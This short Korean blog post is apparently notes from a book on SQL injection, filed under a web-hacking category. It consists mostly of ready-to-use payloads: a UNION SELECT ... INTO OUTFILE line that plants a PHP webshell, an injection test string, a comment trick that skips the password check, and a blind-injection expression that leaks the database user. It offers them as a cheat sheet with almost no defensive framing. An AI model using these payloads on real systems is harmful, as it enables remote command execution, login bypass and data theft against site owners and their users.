SQL injection 공격 과 방어의 원리 책들중...
UNION 구문과 INTO OUTFILE 을 이용하여 웹쉘 만들기
| 1 UNION SELECT "<?system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/cmd.php" -- |
취약점 테스트로 좋은 구문
php?category=bikes ->php?category=bi'+'kes |
패스워드 주석처리해 버리기(세미콜론이 먹힐때 )
select *from table where username='admin '/*'and passworkd='*/''; |
AND 나 OR 절 안쓰고 블라인드 하기
where id =12/ (case+when+(ascii(substring(select+system_user),1,1))+>+64)+then+1+else+0+end) //OK or error |
'Web_Hacking' 카테고리의 다른 글
| Zeroboard XE 1.5.3.3 admin 페이지의 webshell 인젝션 취약점 (0) | 2012.11.26 |
|---|---|
| php://filter for local file inclusion LFI 취약점의 이용 (0) | 2012.08.13 |
| sql injection awk 를 이용하여 빠르게 점검하기. (0) | 2012.08.12 |
| XSS 다양한 우회 패턴 (0) | 2012.08.08 |
| PHP-CGI 취약점. php 소스 보기 FRI 걸기 (0) | 2012.07.19 |
